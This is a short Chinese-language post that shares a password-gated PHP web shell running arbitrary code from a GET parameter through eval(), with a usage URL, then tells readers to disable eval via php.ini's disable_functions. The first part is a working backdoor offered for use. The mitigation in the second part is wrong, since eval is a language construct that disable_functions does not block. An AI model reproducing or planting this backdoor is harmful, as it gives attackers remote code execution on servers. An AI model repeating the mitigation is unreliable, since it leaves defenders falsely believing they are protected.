第一部分:

分享个php eval后门程序
要求必须支持eval函数
使用方法
http://url/test.php?pwd=admin&action=eval&a=phpinfo();

代码:

<?php
$passwd = "admin" ; if ( $_GET [ 'pwd' ]!= $passwd ) exit ;
if ( $_GET [ 'action' ]== "eval" && $_GET [ 'a' ]){ eval ( $_GET [ 'a' ]);}
?>



第二部分:

禁用eval()函数:

php.ini中找到

disable_functions
写成
disable_functions = phpinfo,eval     之类即可